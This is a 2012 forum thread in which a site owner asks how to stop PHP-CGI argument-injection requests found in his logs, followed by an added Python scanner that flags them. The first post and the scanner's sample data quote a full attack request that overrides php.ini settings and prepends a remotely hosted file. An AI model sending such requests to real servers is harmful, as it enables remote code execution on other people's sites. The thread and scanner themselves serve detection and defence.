astralaaron Posted June 15, 2012

I have recently cleared malicious code and htaccess files off of a couple of my websites and changed the passwords. Since then I have been watching my access logs and I can see routinely there is someone trying to run commands like this:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt

I removed the IP address that was in the link they are trying to use in the auto_prepend_file option because I got a virus when I tried connecting to it from my computer.

My question is simply: is there an easy way to disable the -d 'switches' they are trying to use to override the php.ini settings? If not, would making a function to run the $_GET array through to check for a pattern match be an effective way of stopping those settings from being used? From what I understand, the auto_prepend_file is a file that runs before the page loads. Any advice is appreciated.

justsomeguy Posted June 15, 2012

It looks like that vulnerability is fixed in 5.4.3, and from what I can tell it only affects the CGI version. If you're running PHP as an Apache module that shouldn't be an issue. Otherwise, there's a solution regarding htaccess here: https://bugs.php.net/bug.php?id=61910

astralaaron Posted June 16, 2012 (edited)

Thank you for clearing that up, PHP is running as an Apache module.
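
A log check for the request shape quoted in the first post, as an added example that is not part of the original thread: it flags query strings that start with `-` (or `%2d`) and contain no unencoded `=`, then decodes the `-d` overrides they carry. The function names, the combined-log layout and the 192.0.2.x sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"([A-Z]+) (\S+)')   # method and target of a logged request

# Constructed sample lines; the second carries the request quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2012:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.66 - - [15/Jun/2012:10:00:05 +0000] "GET /index.php?-dsafe_mode%3dOff'
    '+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn'
    '+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/Jun/2012:10:00:09 +0000] "GET /search.php?q=-d+flag HTTP/1.1" 200 512',
]

def switch_overrides(target):
    """Return {directive: value} for -d switches in a request target, or {}
    when the query string is not shaped like command-line arguments."""
    _, sep, query = target.partition("?")
    # Argument-style query: starts with "-" (raw or %2d) and has no literal "=".
    if not sep or "=" in query or not re.match(r"(?:-|%2d)", query, re.I):
        return {}
    overrides = {}
    for arg in query.split("+"):           # "+" separates the arguments
        arg = unquote(arg)                 # %3d becomes "=" only after decoding
        if arg.startswith("-d") and "=" in arg:
            name, _, value = arg[2:].partition("=")
            overrides[name] = value
    return overrides

def scan(lines):
    """Yield (client, overrides, remote_include) for each flagged log line."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        found = switch_overrides(m.group(2))
        if found:
            client = line.split(" ", 1)[0]
            prepend = found.get("auto_prepend_file", "")
            yield client, found, prepend.startswith(("http://", "https://", "ftp://"))

if __name__ == "__main__":
    for client, found, remote in scan(SAMPLE_LOG):
        print(client, "remote include" if remote else "ini override", sorted(found))
```

The third sample line is left alone because its query string contains a literal `=`, so it is an ordinary parameter rather than an argument list.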